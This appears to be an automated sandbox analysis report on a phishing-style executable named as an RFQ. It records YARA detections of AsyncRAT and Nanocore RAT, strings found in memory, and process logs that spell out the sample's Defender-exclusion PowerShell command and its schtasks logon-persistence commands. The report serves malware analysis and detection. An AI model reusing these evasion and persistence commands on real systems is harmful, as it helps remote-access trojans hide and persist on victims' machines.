Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmp | String found in binary or memory: http://igaeditor.sourceforge.net/ohttp://www.totalbf2142.com/forums/showthread.php?t=5342
Source: mozille.exe | String found in binary or memory: http://igaeditor.sourceforge.net/wiki/
Source: mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmp | String found in binary or memory: http://micolous.id.au
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.341191488.0000000006C10000.00000004.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338715728.0000000003709000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.396925002.0000000006750000.00000004.00020000.sdmp, mozille.exe, 0000000E.00000002.394466512.0000000003659000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.580953387.00000000078F0000.00000004.00020000.sdmp | String found in binary or memory: http://micolous.id.au/
Source: mozille.exe | String found in binary or memory: http://micolous.id.au/projects/bf21
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.341191488.0000000006C10000.00000004.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338715728.0000000003709000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.396925002.0000000006750000.00000004.00020000.sdmp, mozille.exe, 0000000E.00000002.394466512.0000000003659000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.575440695.00000000042C9000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.580953387.00000000078F0000.00000004.00020000.sdmp | String found in binary or memory: http://micolous.id.au/projects/bf2142/
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmp | String found in binary or memory: http://micolous.id.au/projects/bf2142/.
Source: mozille.exe | String found in binary or memory: http://registry.gimp.org/plugin?id=4816
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.360806225.0000000002B36000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, mozille.exe, 0000000F.00000002.572294732.00000000032C1000.00000004.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.fonts.com
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: mozille.exe, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmp | String found in binary or memory: http://www.gimp.org/windows/
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: mozille.exe, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmp | String found in binary or memory: http://www.pcgamingboards.com/smf/index.php?topic=129.msg279#msg279
Source: mozille.exe | String found in binary or memory: http://www.radgametools.com/bnkdown.htm
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.tiro.com
Source: mozille.exe | String found in binary or memory: http://www.totalbf2142.com/forums/showthread.php?t=5342
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.typography.netD
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.340212666.00000000067C2000.00000004.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: mozille.exe | String found in binary or memory: https://sourceforge.net/project/showfiles.php?group_id=181663
                  Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000000.294283178.0000000000392000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000000.327586416.0000000000162000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333928558.0000000000582000.00000002.00020000.sdmp, RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp, mozille.exe, 0000000E.00000000.362803086.0000000000262000.00000002.00020000.sdmp, mozille.exe, 0000000F.00000000.372058011.0000000000F12000.00000002.00020000.sdmpString found in binary or memory: https://sourceforge.net/project/showfiles.php?group_id=181663Mhttp://igaeditor.sourceforge.net/wiki/
                  Source: mozille.exeString found in binary or memory: https://sourceforge.net/svn/?group_id=181663

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected AsyncRAT
Source: Yara match | File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.RFQ_GGMC-Ref 12-01-2022.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.RFQ_GGMC-Ref 12-01-2022.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.RFQ_GGMC-Ref 12-01-2022.exe.277261c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.mozille.exe.26c25b0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000015.00000002.564363154.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.335571895.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000000.389862678.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000000.390327325.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000003.453796076.00000000056C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.335001041.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.359864523.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000000.388653976.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.334452217.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.333878908.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000000.390769248.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000015.00000002.571714369.00000000031A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.393670309.0000000002651000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6964, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RFQ_GGMC-Ref 12-01-2022.exe PID: 6948, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: mozille.exe PID: 6316, type: MEMORYSTR
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.337721695.0000000000A48000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected Nanocore RAT
Source: Yara match | File source: 00000028.00000000.532162937.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.533503527.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.575326002.0000000003B89000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.534610587.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000000.531340924.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.578385897.0000000005530000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000021.00000002.539866646.00000000043B9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.564500309.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000028.00000002.572373638.0000000002B81000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 00000028.00000002.578366682.0000000005520000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000000.532162937.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000000.532162937.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000028.00000000.533503527.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000000.533503527.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000028.00000002.575326002.0000000003B89000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000028.00000000.534610587.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000000.534610587.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000028.00000000.531340924.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000000.531340924.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000028.00000002.578385897.0000000005530000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000021.00000002.539866646.00000000043B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000021.00000002.539866646.00000000043B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000028.00000002.564500309.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000028.00000002.564500309.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000028.00000002.572373638.0000000002B81000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: RFQ_GGMC-Ref 12-01-2022.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 00000028.00000002.578366682.0000000005520000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.578366682.0000000005520000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000028.00000000.532162937.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000000.532162937.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000028.00000000.533503527.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000000.533503527.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000028.00000002.575326002.0000000003B89000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000028.00000000.534610587.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000000.534610587.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000028.00000000.531340924.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000000.531340924.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000028.00000002.578385897.0000000005530000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.578385897.0000000005530000.00000004.00020000.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
Source: 00000021.00000002.539866646.00000000043B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000021.00000002.539866646.00000000043B9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000028.00000002.564500309.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 00000028.00000002.564500309.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 00000028.00000002.572373638.0000000002B81000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Code function: 0_2_00A3E721
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Code function: 0_2_00A3E730
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Code function: 0_2_00A3C764
Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Code function: 14_2_00C1C764
Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Code function: 14_2_00C1E721
Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Code function: 14_2_00C1E730
Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Code function: 14_2_04F87ABC
Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Code function: 14_2_04F8827B
Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Code function: 15_2_01A0E721
Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Code function: 15_2_01A0E730
Source: C:\Users\user\AppData\Local\Temp\mozille.exe | Code function: 15_2_01A0C764
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.337279816.000000000041E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIDescriptionMetadataEnt.exeH vs RFQ_GGMC-Ref 12-01-2022.exe
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338424053.0000000002701000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameStub.exe" vs RFQ_GGMC-Ref 12-01-2022.exe
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.337721695.0000000000A48000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs RFQ_GGMC-Ref 12-01-2022.exe
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000000.00000002.338715728.0000000003709000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUI.dllF vs RFQ_GGMC-Ref 12-01-2022.exe
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000005.00000002.328182607.00000000001EE000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIDescriptionMetadataEnt.exeH vs RFQ_GGMC-Ref 12-01-2022.exe
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.333072613.000000000060E000.00000002.00020000.sdmp | Binary or memory string: OriginalFilenameIDescriptionMetadataEnt.exeH vs RFQ_GGMC-Ref 12-01-2022.exe
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000000.334476834.000000000040E000.00000040.00000001.sdmp | Binary or memory string: OriginalFilenameStub.exe" vs RFQ_GGMC-Ref 12-01-2022.exe
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.361685768.0000000003B04000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameIDescriptionMetadataEnt.exeH vs RFQ_GGMC-Ref 12-01-2022.exe
Source: RFQ_GGMC-Ref 12-01-2022.exe, 00000007.00000002.360214785.0000000000CEA000.00000004.00000020.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs RFQ_GGMC-Ref 12-01-2022.exe
Source: RFQ_GGMC-Ref 12-01-2022.exe | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: lhWbLvHNlciwu.exe.0.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: RFQ_GGMC-Ref 12-01-2022.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: lhWbLvHNlciwu.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: RFQ_GGMC-Ref 12-01-2022.exe | Virustotal: Detection: 26%
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | File read: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
Source: RFQ_GGMC-Ref 12-01-2022.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe "C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe"
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\lhWbLvHNlciwu.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\lhWbLvHNlciwu" /XML "C:\Users\user\AppData\Local\Temp\tmp71CD.tmp
Source: C:\Windows\SysWOW64\schtasks.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"' & exit
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\RFQ_GGMC-Ref 12-01-2022.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpB8D1.tmp.bat""
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "mozille" /tr '"C:\Users\user\AppData\Local\Temp\mozille.exe"'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\timeout.exe timeout 3
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\mozille.exe C:\Users\user\AppData\Local\Temp\mozille.exe
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\AppData\Local\Temp\mozille.exe "C:\Users\user\AppData\Local\Temp\mozille.exe"
